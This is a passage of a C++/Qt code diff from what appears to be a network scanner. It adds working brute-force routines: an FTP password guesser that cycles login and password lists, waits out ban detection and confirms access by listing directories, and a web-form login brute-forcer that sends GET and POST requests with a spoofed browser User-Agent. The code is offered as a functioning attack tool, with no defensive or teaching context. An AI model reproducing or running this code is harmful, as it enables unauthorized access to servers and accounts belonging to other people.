+ strcpy(lps.pass, "1");
+ return lps;
+ };
+
+ if(strstr(recvBuff, "550 no connections allowed") != NULL
+ || strstr(recvBuff, "550-") != NULL
+ )
+ {
+ CSSOCKET(sockFTP);
+
+ isActive = 0;
+
+
+ stt->doEmition_BARedData("[-] 550 (No connections allowed) - Ban detected. Dropping " + QString(ip));
+
+
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+
+ if(strstr(recvBuff, "no such command"))
+ {
+ CSSOCKET(sockFTP);
+
+ isActive = 0;
+ stt->doEmition_BARedData("[-] 500 (Sorry, no such command) " + QString(ip));
+ strcpy(lps.other, "[500 Sorry, no such command]");
+ return lps;
+ };
+
+ if((strstr(recvBuff, "500 ") != NULL
+ || strstr(recvBuff, "500-") != NULL
+ )
+ && strstri(recvBuff, "500 oops") == NULL
+ )
+ {
+ j = 0;
+ break;
+ };
+
+ if(strstr(recvBuff, "421 ") != NULL || strstr(recvBuff, "421-") != NULL)
+ {
+ break;
+ };
+
+ if(strstri(recvBuff, "530 Sorry, no ANONYMOUS access allowed.") != NULL)
+ {
+ ++i;
+ break;
+ };
+
+ if(globalScanFlag == false) break;
+
+ if((strstr(recvBuff, "530 Sorry") != NULL)
+ || (strstr(recvBuff, "530") != NULL && strstr(recvBuff, "maximum") != NULL)
+ || strstr(recvBuff, "exceeded") != NULL
+ || strstr(recvBuff, "421 Too many") != NULL
+ || strstr(recvBuff, "from this IP") != NULL
+ || strstr(recvBuff, "from your IP") != NULL)
+ {
+ stt->doEmition_BARedData("[-] FTP: 530 - Ban detected? Waiting 30sec (" + QString(ip) + ")");
+ if(j > 0) --j;
+ ZeroMemory(recvBuff, sizeof(recvBuff));
+ Sleep(30000);
+ break;
+ }
+ else if( (strstr(recvBuff, "220 ") != NULL || loginFailedFlag == 1 || strstr(recvBuff, "503") != NULL || strstr(recvBuff, "server ready") != NULL ))
+ {
+ strcpy(request, "USER ");
+ if(strlen(loginLst[i]) != 0) strcat(request, loginLst[i]);
+ else
+ {
+ loginFailedFlag = 1;
+ break;
+ };
+ strcat(request, "\r\n");
+ if(send(sockFTP, request, strlen(request), 0) != SOCKET_ERROR)
+ {
+ if(MapWidgetOpened) stt->doEmitionAddOutData(QString(ip), QString(request));
+ Activity += strlen(request);
+
+ ZeroMemory(request, sizeof(request));
+ }
+ else
+ {
+ stt->doEmitionRedFoundData("[FTP] Send error. " + QString(ip) + ":" + QString::number(port));
+ };
+ }
+ else if(strstr(recvBuff, "530") != NULL
+ || strstr(recvBuff, "Login incorrect") != NULL
+ || strstri(recvBuff, "500 oops") != NULL
+ )
+ {
+ loginFailedFlag = 1;
+ break;
+ }
+ else if(strstr(recvBuff, "331") != NULL)
+ {
+ if(strstr(recvBuff, "Non-anonymous sessions must use encryption") != NULL
+ || strstr(recvBuff, "Rejected--secure connection required") != NULL
+ )
+ {
+ stt->doEmition_BARedData("FTP server (" + QString(ip) + ") appears to require SSL for specified user: " + QString(loginLst[i]));
+ CSSOCKET(sockFTP);
+
+ isActive = 0;
+
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ }
+ else if(strstri(recvBuff, "permission denied") == NULL)
+ {
+ strcpy(request, "PASS ");
+ if(strlen(passLst[j]) != 0) strcat(request, passLst[j]);
+ else
+ {
+ loginFailedFlag = 1;
+ break;
+ };
+ strcat(request, "\r\n");
+ if(send(sockFTP, request, strlen(request), 0) != SOCKET_ERROR)
+ {
+ if(MapWidgetOpened) stt->doEmitionAddOutData(QString(ip), QString(request));
+
+ Activity += strlen(request);
+ ZeroMemory(request, sizeof(request));
+
+ if(BALogSwitched) stt->doEmitionBAData("Probing FTP: " + QString(ip) + ":" + QString::number(port) + "; login/pass: " + QString(loginLst[i]) + ":" + QString(passLst[j]) + "; - Progress: (" + QString::number((passCounter/(double)(MaxPass*MaxLogin)) * 100).mid(0, 4) + "%)");
+ ++passCounter;
+ }
+ else
+ {
+ stt->doEmitionRedFoundData("[FTP] Send error. " + QString(ip) + ":" + QString::number(port));
+ };
+ }
+ else
+ {
+ breakPassLoop = 1;
+ stt->doEmition_BARedData("Permission denied for login - " + QString(ip) + ":" + QString::number(port) + "; login: " + QString(loginLst[i]));
+ break;
+ };
+ }
+ else if(strstr(recvBuff, "230") != NULL)
+ {
+ char pass[128] = {0};
+
+ strcpy(pass, ip);
+ strcat(pass, " - FTP Password found: ");
+ strcat(pass, loginLst[i]);
+ strcat(pass, ":");
+ strcat(pass, passLst[j]);
+
+ char recvBuff2[2048] = {0};
+ if(send(sockFTP, "PASV\r\n", 6, 0) != SOCKET_ERROR)
+ {
+ int x = 1, xx = 0;
+ while(x != 0)
+ {
+ ZeroMemory(recvBuff, sizeof(recvBuff));
+ x = recvWT(sockFTP, recvBuff, sizeof(recvBuff), gTimeOut + 5, &bTO);
+ xx += x;
+ if(xx < 1536) strncat(recvBuff2, recvBuff, x);
+ else break;
+ };
+
+ if(strstri(recvBuff2, "unknown command") != NULL || strstri(recvBuff2, "invalid command") != NULL)
+ {
+ stt->doEmitionYellowFoundData("[-] PASV failed. Router detected?");
+ CSSOCKET(sockFTP);
+ strcpy(lps.login, loginLst[i]);
+ strcpy(lps.pass, passLst[j]);
+ strcpy(lps.other, "ROUTER");
+ isActive = 0;
+ return lps;
+ };
+
+#pragma region Get pasv Port
+ char *ptr0 = strstr(recvBuff2, "227 ");
+
+ if( ptr0 != NULL )
+ {
+ if(strstr(ptr0, "(") != NULL)
+ {
+ char pasvData[32] = {0};
+ char *ptr1 = strstr(ptr0, "(");
+ char *ptr2 = strstr(ptr0, ")");
+ int sz = ptr2 - ptr1 - 1;
+ strncpy(pasvData, ptr1 + 1, sz);
+ char *ptr3 = strstr(pasvData, ",");
+ ptr3 = strstr(ptr3 + 1, ",");
+ ptr3 = strstr(ptr3 + 1, ",");
+ ptr3 = strstr(ptr3 + 1, ",");
+
+ if(ptr3 != NULL)
+ {
+ char *ptrP2 = strstr(ptr3 + 1, ",");
+ char p1c[8] = {0};
+ sz = ptrP2 - ptr3 - 1;
+ strncpy(p1c, ptr3 + 1, sz);
+ int p1 = atoi(p1c);
+ int p2 = atoi(ptrP2 + 1);
+ port = p1 * 256 + p2;
+
+ sockAddr.sin_port = htons(port);
+ SOCKET newSockFTP = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
+ connectionResult = connect(newSockFTP, (sockaddr*)&sockAddr, sizeof(sockAddr));
+
+ send(sockFTP, "LIST\r\n", 6, 0);
+ ZeroMemory(recvBuff, sizeof(recvBuff));
+ int x = recvWT(newSockFTP, recvBuff, sizeof(recvBuff), gTimeOut + 3, &bTO);
+ if(x <= 0 || strstr(recvBuff, "unknown command") != NULL)
+ {
+ send(sockFTP, "MLSD\r\n", 6, 0);
+ ZeroMemory(recvBuff, sizeof(recvBuff));
+ x = recvWT(newSockFTP, recvBuff, sizeof(recvBuff), gTimeOut + 3, &bTO);
+ if(x <= 0 || strstr(recvBuff, "unknown command") != NULL)
+ {
+ stt->doEmition_BAGreenData("[?] " + QString(pass) + " [MLSD&LIST failed or server closed connection.]");
+
+ CSSOCKET(sockFTP);
+ CSSOCKET(newSockFTP);
+ closedSocket = 1;
+ isActive = 0;
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ }
+ else {
+ stt->doEmition_BAGreenData("[+] " + QString(pass) + " [MLSD succeeded]");
+ ps->directoryCount = _countFTPDirectories(recvBuff);
+ };
+ }
+ else
+ {
+ stt->doEmition_BAGreenData("[+] " + QString(pass) + " [LIST succeeded]");
+ ps->directoryCount = _countFTPDirectories(recvBuff);
+ };
+
+ CSSOCKET(newSockFTP);
+ }
+ else
+ {
+ stt->doEmitionYellowFoundData("[*] " + QString(ip) + " [PASV failed]");
+ };
+ }
+ else
+ {
+ stt->doEmitionYellowFoundData("[*] " + QString(ip) + " [PASV TO] Failed!");
+ };
+ }
+ else
+ {
+ stt->doEmitionYellowFoundData("[*] " + QString(ip) + " [PASV TO] Failed!");
+ };
+
+
+ if(xx > 1)
+ {
+ strcpy(ps->headr, " (");
+ strncat(ps->headr, recvBuff, 256);
+ strcat(ps->headr, ")
");
+ };
+
+ strcpy(lps.login, loginLst[i]);
+ strcpy(lps.pass, passLst[j]);
+
+ CSSOCKET(sockFTP);
+ isActive = 0;
+ return lps;
+ }
+ else
+ {
+ stt->doEmitionRedFoundData("[FTP] Send error. " + QString(ip) + ":" + QString::number(port));
+
+ strcpy(lps.login, loginLst[i]);
+ strcpy(lps.pass, passLst[j]);
+
+ CSSOCKET(sockFTP);
+ isActive = 0;
+ return lps;
+ };
+ };
+ };
+
+ CSSOCKET(sockFTP);
+ closedSocket = 1;
+ ZeroMemory(recvBuff, sizeof(recvBuff));
+ }
+ else
+ {
+ char err[128] = {0};
+
+ int WSAerr;
+ if(connectionResult == -1) WSAerr = WSAGetLastError();
+ else WSAerr = 10060;
+
+ if(gThreads > 1 && WSAerr != 10060/*Timeout*/ && WSAerr != 10055/*POOLOVERFLOW*/ && WSAerr != 10061/*WSAECONNREFUSED*/ && WSAerr != 10054/*WSACONNABORTED*/ && WSAerr != 0)
+ {
+ stt->doEmitionRedFoundData("[FTPBrute] Cannot connect to " + QString(ip) + " " + QString(std::to_string(WSAerr).c_str()));
+ };
+ CSSOCKET(sockFTP);
+ isActive = 0;
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+
+ Sleep(100);
+
+ if(breakPassLoop)
+ {
+ breakPassLoop = false;
+ break;
+ };
+ };
+ };
+
+ CSSOCKET(sockFTP);
+ isActive = 0;
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+};
+lopaStr Connector::_FTPLobby(char *ip, int port, PathStr *ps)
+{
+ while(BrutingThrds >= gMaxBrutingThreads) Sleep(700);
+
+ lopaStr lps;
+ ZeroMemory(lps.login, sizeof(lps.login));
+ ZeroMemory(lps.pass, sizeof(lps.pass));
+ ZeroMemory(lps.other, sizeof(lps.other));
+
+ BConInc();
+ lps = _FTPBrute(ip, port, ps);
+ BConDec();
+
+ return lps;
+};
+
+int _sslConnectTo(char *iph, int porth, char *requesth, conSTR *CSTR)
+{
+ SSL *ssl = NULL;
+ int bytes = 0;
+ char *recvBuff2 = 0;
+ int resCode = 0;
+
+ const SSL_METHOD *method = SSLv3_client_method(); /* Create new client-method instance */
+ SSL_CTX *ctx = SSL_CTX_new(method); /* Create new context */
+ if(ctx != NULL)
+ {
+ SOCKET sock;
+ SSL_CTX_set_timeout(ctx, gTimeOut);
+ resCode = OpenConnection(&sock, iph, porth);
+ if(resCode >= 0)
+ {
+ ssl = SSL_new(ctx); /* create new SSL connection state */
+ SSL_set_fd(ssl, sock); /* attach the socket descriptor */
+
+ if(SSL_connect(ssl))
+ {
+ SSL_write(ssl, requesth, strlen(requesth));
+ if(MapWidgetOpened) stt->doEmitionAddOutData(QString(iph), QString(requesth));
+
+ int x = 256;
+ char recvBuff[8192] = {0};
+ recvBuff2 = new char[RECV_MAX_SIZE];
+ ZeroMemory(recvBuff2, RECV_MAX_SIZE);
+
+ while (x > 0)
+ {
+ ZeroMemory(recvBuff, sizeof(recvBuff));
+ x = SSL_read(ssl, recvBuff, sizeof(recvBuff));
+ if(x <= 0) break;
+
+ bytes += x;
+ Activity += x;
+
+ if( bytes > RECV_MAX_SIZE )
+ {
+ if(strstri(recvBuff2, "http/1.") == NULL)
+ {
+ if(HTMLDebugMode) _DebugWriteHTMLToFile(requesth, recvBuff2);
+ delete[] recvBuff2;
+ recvBuff2 = NULL;
+ CSSOCKET(sock);
+
+ ++Overl;
+
+ CSTR->lowerBuff = new char[11];
+ strcpy(CSTR->lowerBuff, "[OVERFLOW]");
+ CSTR->size = 10;
+ SSL_free(ssl);
+ SSL_CTX_free(ctx); /* release context */
+ return 0;
+ }
+ else break;
+ };
+ if(globalScanFlag == true)
+ {
+ if(x > 0)
+ {
+ memset((void*)(recvBuff + x), '\0', 1);
+ strcat(recvBuff2, recvBuff);
+ }
+ else
+ {
+ if(HTMLDebugMode) _DebugWriteHTMLToFile(requesth, recvBuff2);
+
+ delete[] recvBuff2;
+ recvBuff2 = NULL;
+ CSSOCKET(sock);
+ CSTR->lowerBuff = new char[12];
+ strcpy(CSTR->lowerBuff, "[IGNR_ADDR]");
+
+ CSTR->size = 11;
+ SSL_free(ssl);
+ SSL_CTX_free(ctx); /* release context */
+ return 0;
+ };
+ };
+ };
+
+ if(bytes < 0)
+ {
+ stt->doEmitionRedFoundData("[SSL](_SSLConnect [bytes < 0]) " + QString(iph) + ":" + QString::number(porth));
+ };
+
+ SSL_free(ssl);
+ CSSOCKET(sock);
+ SSL_CTX_free(ctx); /* release context */
+
+ if(bytes == 0 || recvBuff2 == NULL)
+ {
+ if(recvBuff2 != NULL) delete []recvBuff2;
+ recvBuff2 = NULL;
+ CSTR->lowerBuff = new char[1];
+ strcpy(CSTR->lowerBuff, "");
+ CSTR->size = 0;
+ return -1;
+ };
+ if(MapWidgetOpened) stt->doEmitionAddIncData(QString(iph), QString(recvBuff2));
+ std::string res2 = "";
+ if(strlen(recvBuff2) > bytes) bytes = strlen(recvBuff2);
+ CSTR->lowerBuff = new char[bytes + 1];
+ ZeroMemory(CSTR->lowerBuff, sizeof(CSTR->lowerBuff));
+
+ strncpy(CSTR->lowerBuff, recvBuff2, bytes);
+
+ delete[] recvBuff2;
+ recvBuff2 = NULL;
+ CSTR->size = bytes;
+ if(HTMLDebugMode) _DebugWriteHTMLToFile(requesth, CSTR->lowerBuff);
+ return 0;
+ }
+ else
+ {
+ delete[] recvBuff2;
+ recvBuff2 = NULL;
+ CSSOCKET(sock);
+ SSL_free(ssl);
+ SSL_CTX_free(ctx); /* release context */
+ CSTR->lowerBuff = new char[1];
+ strcpy(CSTR->lowerBuff, "");
+ CSTR->size = 0;
+ return 0;
+ };
+ };
+ }
+ else
+ {
+ char buff1[512] = {0};
+ char buff2[512] = {0};
+
+ ERR_error_string(ERR_peek_error(), buff1);
+ ERR_error_string(ERR_peek_last_error(), buff2);
+ stt->doEmitionRedFoundData(QString(iph) + ":" + QString(porth) + " SSL(InitCTX) 1:" + QString(buff1) + " 2:" + QString(buff2));
+ return -1;
+ }
+};
+int Connector::_EstablishSSLConnection(char *iph, int porth, char *requesth, conSTR *CSTR)
+{
+ return _sslConnectTo(iph, porth, requesth, CSTR);
+};
+void __deleteExcessiveNullBytes(char *buff, int sz)
+{
+ int j = 0;
+ for(int i = 0; i < sz - 1; ++i)
+ {
+ if(buff[i] != 0) buff[j++] = buff[i];
+ };
+};
+struct linger linger = { 0 };
+int Connector::_EstablishConnection(char *ip, int port, char *request, conSTR *CSTR, int force)
+{
+ CSTR->lowerBuff = NULL;
+ if(strlen(ip) == 0)
+ {
+ return -1;
+ };
+ if(port < 0 || port > 65535)
+ {
+ return -1;
+ };
+
+ char *recvBuff2 = NULL;
+ sockaddr_in sockAddr;
+ sockAddr.sin_family = AF_INET;
+ sockAddr.sin_port = htons(port);
+
+ HOSTENT *host;
+#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
+ if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.S_un.S_addr = inet_addr(ip);
+#else
+ if(inet_addr(ip) != INADDR_NONE) sockAddr.sin_addr.s_addr = inet_addr(ip);
+#endif
+ else if(host = gethostbyname (ip)) ((unsigned long*) &sockAddr.sin_addr)[0] = ((unsigned long**)host->h_addr_list)[0][0];
+ else
+ {
+ ++offlines;
+ if(host == NULL) return -2;
+ else return -1;
+ };
+
+ SOCKET sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
+ while(sock == INVALID_SOCKET)
+ {
+ stt->doEmitionRedFoundData("[Cannot create socket]");
+
+ CSSOCKET(sock);
+ Sleep(100);
+ sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
+ };
+
+#if defined(WIN32) || defined(_WIN32) || defined(__WIN32) && !defined(__CYGWIN__)
+ u_long FAR cmd = 1;
+ if( ioctlsocket( sock , FIONBIO, &cmd ) != 0 )
+#else
+ if( fcntl( sock , F_SETFL, O_NDELAY ) == -1 )
+#endif
+ {
+ stt->doEmitionRedFoundData("[FIONBIO failed]");
+ };
+
+ int recvBuffSize = 0;
+ linger.l_onoff = 1;
+ linger.l_linger = 5;
+ setsockopt(sock, SOL_SOCKET, SO_LINGER, (const char *) &linger, sizeof(linger));
+
+ int iError, iResult = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
+ while(sock == INVALID_SOCKET)
+ {
+ if(gDebugMode) stt->doEmitionDebugFoundData("[Invalid socket]: " + QString::number(WSAGetLastError()));
+ CSSOCKET(sock);
+ Sleep(100);
+ sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
+ setsockopt(sock, SOL_SOCKET, SO_LINGER, (const char *) &linger, sizeof(linger));
+ iResult = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
+ };
+
+ if(iResult == SOCKET_ERROR)
+ {
+ iError = WSAGetLastError();
+
+ if(iError == 10035)
+ {
+ fd_set read_fs;
+ FD_ZERO(&read_fs);
+ FD_SET(sock, &read_fs);
+ timeval tv = { gTimeOut, 0 };
+
+ int oldErr = WSAGetLastError();
+ iResult = select(sock + 1, NULL, &read_fs, NULL, &tv);
+
+ if (iResult == SOCKET_ERROR)
+ {
+ ++offlines;
+
+ stt->doEmitionRedFoundData("[Omitting IP] Select error-" +
+ QString::number(WSAGetLastError()) + " oldErr:" + QString::number(oldErr) +
+ " sock:" + QString::number(sock) + " -" + QString(ip) + ":" + QString::number(port));
+ }
+ else
+ {
+ if (!iResult) ++offlines;
+ else
+ {
+ int sResult = send(sock, request, strlen(request), 0);
+
+ while(sResult == SOCKET_ERROR)
+ {
+ CSSOCKET(sock);
+ Sleep(100);
+ sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
+ sResult = connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
+ if(sResult == SOCKET_ERROR) continue;
+ sResult = send(sock, request, strlen(request), 0);
+ };
+
+ if(sResult != SOCKET_ERROR)
+ {
+ if(MapWidgetOpened) stt->doEmitionAddOutData(QString(ip), QString(request));
+ Activity += strlen(request);
+ char recvBuff[8192] = {0};
+ recvBuff2 = new char[RECV_MAX_SIZE];
+ ZeroMemory(recvBuff2, RECV_MAX_SIZE);
+
+ int bTO;
+ int x = 256;
+ while (x > 0)
+ {
+ ZeroMemory(recvBuff, 8192);
+ x = recvWT(sock, recvBuff, 8192, gTimeOut, &bTO);
+ if(x <= 0) break;
+ Activity += x;
+ recvBuffSize += x;
+ if( recvBuffSize > RECV_MAX_SIZE )
+ {
+ CSSOCKET(sock);
+ ++Overl;
+
+ CSTR->lowerBuff = new char[recvBuffSize];
+ strncpy(CSTR->lowerBuff, recvBuff2, recvBuffSize);
+ CSTR->size = recvBuffSize;
+ CSTR->overflow = true;
+ delete[] recvBuff2;
+ recvBuff2 = NULL;
+ return 0;
+ };
+ strncat(recvBuff2, recvBuff, x);
+ };
+
+ if(strstri(recvBuff2, "no request found") != NULL)
+ {
+ ZeroMemory(recvBuff2, RECV_MAX_SIZE);
+ CSSOCKET(sock);
+ sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
+ connect(sock, (sockaddr*)&sockAddr, sizeof(sockAddr));
+ send(sock, request, strlen(request), 0);
+ x = 1;
+ while (x > 0)
+ {
+ ZeroMemory(recvBuff, 8192);
+ x = recvWT(sock, recvBuff, 8192, gTimeOut, &bTO);
+ if(x <= 0) break;
+ Activity += x;
+ recvBuffSize += x;
+ if( recvBuffSize > RECV_MAX_SIZE )
+ {
+ CSSOCKET(sock);
+ ++Overl;
+
+ CSTR->lowerBuff = new char[recvBuffSize];
+ strncpy(CSTR->lowerBuff, recvBuff2, recvBuffSize);
+ CSTR->size = recvBuffSize;
+ CSTR->overflow = true;
+ delete[] recvBuff2;
+ recvBuff2 = NULL;
+ return 0;
+ };
+ strncat(recvBuff2, recvBuff, x);
+ };
+ };
+ }
+ else
+ {
+ ++offlines;
+ stt->doEmitionRedFoundData("[_EC] Send error: " + QString(ip) + " - " + QString::number(WSAGetLastError()));
+ };
+ };
+ };
+ }
+ else
+ {
+ ++offlines;
+ if(iError == 10055)
+ {
+ stt->doEmitionRedFoundData("[10055] Connection pool depleted " + QString(ip) + ":" + QString::number(port));
+ }
+ else if(iError == 10049)
+ {
+ stt->doEmitionRedFoundData("[10049] " + QString(ip) +
+ ":" + QString::number(port) +
+ " - " + QString::number(iError));
+ }
+ else
+ {
+ stt->doEmitionRedFoundData("[Unknown error] " + QString(ip) +
+ ":" + QString::number(port) +
+ " - " + QString::number(iError));
+ };
+ };
+ }
+ else
+ {
+ stt->doEmitionRedFoundData("[?!] Strange behavior detected - " +
+ QString::number(WSAGetLastError()) +
+ " - " + QString(ip) + ":" + QString::number(port));
+ };
+
+ CSSOCKET(sock);
+
+ if( globalScanFlag == false && force == 0)
+ {
+ if(recvBuff2 != NULL) delete []recvBuff2;
+ recvBuff2 = NULL;
+ return -1;
+ };
+
+ if(recvBuff2 != NULL && recvBuffSize > 0)
+ {
+ if(MapWidgetOpened) stt->doEmitionAddIncData(QString(ip), QString(recvBuff2));
+ CSTR->lowerBuff = new char[recvBuffSize + 1];
+ ZeroMemory(CSTR->lowerBuff, recvBuffSize + 1);
+ CSTR->size = recvBuffSize;
+ strncpy(CSTR->lowerBuff, recvBuff2, recvBuffSize);
+ memset(CSTR->lowerBuff + recvBuffSize, '\0', 1);
+
+ delete []recvBuff2;
+ recvBuff2 = NULL;
+ if(HTMLDebugMode) _DebugWriteHTMLToFile(request, CSTR->lowerBuff);
+ return 0;
+ }
+ else
+ {
+ if(recvBuff2 != NULL) delete []recvBuff2;
+ recvBuff2 = NULL;
+ return -1;
+ };
+};
+
+#pragma region WF
+lopaStr _WFBrut(char *cookie, char *ip, int port, char *methodVal, char *actionVal, char *userVal, char *passVal, char *formVal)
+{
+ lopaStr lps;
+ ZeroMemory(lps.login, sizeof(lps.login));
+ ZeroMemory(lps.pass, sizeof(lps.pass));
+ ZeroMemory(lps.other, sizeof(lps.other));
+
+ int cookieLen = strlen(cookie);
+
+ char b[16] = {0};
+ char request[2048] = {0};
+ char argData[256] = {0};
+ char recvBuffer[65536] = {0};
+
+ Connector con;
+ conSTR CSTR;
+ int cRes;
+ int firstCycle = 0;
+ if(strstri(methodVal, "get") != NULL)
+ {
+ int passCounter = 1;
+ for(int i = 0; i < MaxWFLogin; ++i)
+ {
+ if(globalScanFlag == false) break;
+ for(int j = firstCycle; j < MaxWFPass; ++j)
+ {
+ if(globalScanFlag == false) break;
+ CSTR.lowerBuff = NULL;
+ CSTR.size = 0;
+ cRes = 0;
+
+ strcpy(request, "GET ");
+ strcat(request, actionVal);
+ strcat(request, "?");
+ strcat(request, userVal);
+ strcat(request, "=");
+ strcat(request, wfLoginLst[i]);
+ strcat(request, "&");
+ strcat(request, passVal);
+ strcat(request, "=");
+ strcat(request, wfPassLst[j]);
+ strcat(request, " HTTP/1.1\r\n");
+ strcat(request, "Host: ");
+ strcat(request, ip);
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ sprintf(tbuff, "%d", port);
+ strcat(request, tbuff);
+ if(cookieLen != 0)
+ {
+ strcat(request, "\r\nCookie: ");
+ strcat(request, cookie);
+ };
+ strcat(request, "\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: us-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nConnection: close");
+ strcat(request, "\r\n\r\n");
+
+ if(port == 443) cRes = con._EstablishSSLConnection(ip, port, request, &CSTR);
+ else cRes = con._EstablishConnection(ip, port, request, &CSTR);
+
+ if(BALogSwitched) stt->doEmitionBAData("Checked WF: " + QString(ip) + ":" + QString::number(port) + "; login/pass: "+ QString(wfLoginLst[i]) + ":" + QString(wfPassLst[j]) + "; - Progress: (" + QString::number((passCounter/(double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%)");
+ ++passCounter;
+
+ if(CSTR.lowerBuff != NULL)
+ {
+ if(strstri(CSTR.lowerBuff, "501 not implemented") != NULL)
+ {
+ stt->doEmitionRedFoundData("" + QString(ip) + ":" + QString::number(port) + " - [WF]: 501 Not Implemented.");
+ isActive = 0;
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+ if(strstri(CSTR.lowerBuff, "404 not found") != NULL)
+ {
+ stt->doEmitionRedFoundData("" + QString(ip) + ":" + QString::number(port) + " - [WF]: 404 Not Found.");
+ isActive = 0;
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+ if(strstri(CSTR.lowerBuff, "Access is Denied") == NULL
+ && strstri(CSTR.lowerBuff, "Location:") == NULL
+ && strstri(CSTR.lowerBuff, "Access forbidden") == NULL
+ && strstri(CSTR.lowerBuff, "Authentication required") == NULL
+ && strstri(CSTR.lowerBuff, "invalid") == NULL
+ && strstri(CSTR.lowerBuff, "error") == NULL
+ && strstri(CSTR.lowerBuff, "loginerr") == NULL
+ && strstri(CSTR.lowerBuff, "passerr") == NULL
+ && strstri(CSTR.lowerBuff, "passworderr") == NULL
+ && strstri(CSTR.lowerBuff, "location.href") == NULL
+ && strstri(CSTR.lowerBuff, "location.replace") == NULL
+ && strstri(CSTR.lowerBuff, "top.location") == NULL
+ && strstri(CSTR.lowerBuff, "error_status") == NULL
+ && strstri(CSTR.lowerBuff, "501 not implemented") == NULL
+ && strstri(CSTR.lowerBuff, "http-equiv=\"refresh\"") == NULL
+ && strstri(CSTR.lowerBuff, "http-equiv = \"refresh\"") == NULL
+ && strstri(CSTR.lowerBuff, "busy") == NULL
+ && strstri(CSTR.lowerBuff, "later") == NULL
+ && strstri(CSTR.lowerBuff, "verification failed") == NULL
+ && strstri(CSTR.lowerBuff, "403 Forbidden") == NULL
+ && strstri(CSTR.lowerBuff, formVal) == NULL
+
+ )
+ {
+ if(i == 0)
+ {
+ ZeroMemory(request, sizeof(request));
+
+ isActive = 0;
+
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+ char pass[256] = {0};
+
+ ZeroMemory(pass, sizeof(pass));
+ strcpy(pass, ip);
+ strcat(pass, " - Web Form password found: ");
+ strcat(pass, wfLoginLst[i]);
+ strcat(pass, ":");
+ strcat(pass, wfPassLst[j]);
+ isActive = 0;
+
+ stt->doEmition_BAGreenData("[+] " + QString(pass));
+
+ strcpy(lps.login, wfLoginLst[i]);
+ strcpy(lps.pass, wfPassLst[j]);
+ return lps;
+ };
+ }
+ else
+ {
+ ZeroMemory(request, sizeof(request));
+
+ isActive = 0;
+
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+
+ if(i == 0) ++i;
+ ZeroMemory(request, sizeof(request));
+ };
+ firstCycle = 1;
+ };
+ }
+ else if(strstri(methodVal, "post") != NULL)
+ {
+ int passCounter = 1;
+ int firstCycle = 0;
+ for(int i = 0; i < MaxWFLogin; ++i)
+ {
+ if(globalScanFlag == false) break;
+ for(int j = firstCycle; j < MaxWFPass; ++j)
+ {
+ if(globalScanFlag == false) break;
+ CSTR.lowerBuff = NULL;
+ CSTR.size = 0;
+ cRes = 0;
+
+ strcpy(argData, userVal);
+ strcat(argData, "=");
+ strcat(argData, wfLoginLst[i]);
+ strcat(argData, "&");
+ strcat(argData, passVal);
+ strcat(argData, "=");
+ strcat(argData, wfPassLst[j]);
+
+ strcpy(request, "POST ");
+ strcat(request, actionVal);
+ strcat(request, " HTTP/1.1\r\n");
+ strcat(request, "Host: ");
+ strcat(request, ip);
+ strcat(request, ":");
+ char tbuff[16] = {0};
+ sprintf(tbuff, "%d", port);
+ strcat(request, tbuff);
+ if(cookieLen != 0)
+ {
+ strcat(request, "\r\nCookie: ");
+ strcat(request, cookie);
+ };
+ strcat(request, "\r\nContent-type: application/x-www-form-urlencoded\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: us-US,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: text, identity, *;q=0\r\nUser-Agent: Mozilla/5.0 (X11; U; Linux i686; us; rv:1.9.0.11) Gecko/2009060308 Ubuntu/9.04 (jaunty) Firefox/3.0.11\r\nConnection: close\r\nContent-Length: ");
+ sprintf(b, "%d", strlen(argData));
+ strcat(request, b);
+ strcat(request, "\r\n\r\n");
+
+ strcat(request, argData);
+
+ if(BALogSwitched) stt->doEmitionBAData("Checked WF: " + QString(ip) + ":" + QString::number(port) + "; login/pass: "+ QString(wfLoginLst[i]) + ":" + QString(wfPassLst[j]) + "; - Progress: (" + QString::number((passCounter/(double)(MaxWFPass*MaxWFLogin)) * 100).mid(0, 4) + "%)");
+ ++passCounter;
+
+ if(port == 443) cRes = con._EstablishSSLConnection(ip, port, request, &CSTR);
+ else cRes = con._EstablishConnection(ip, port, request, &CSTR);
+
+ if(CSTR.lowerBuff != NULL)
+ {
+ if(strstri(CSTR.lowerBuff, "501 not implemented") != NULL)
+ {
+ stt->doEmitionRedFoundData("" + QString(ip) + ":" + QString::number(port) + " - [WF]: 501 Not Implemented.");
+ isActive = 0;
+ strcpy(lps.login, "UNKNOWN");
+ return lps;
+ };
+ if(strstri(CSTR.lowerBuff, "404 not found") != NULL)
+ {
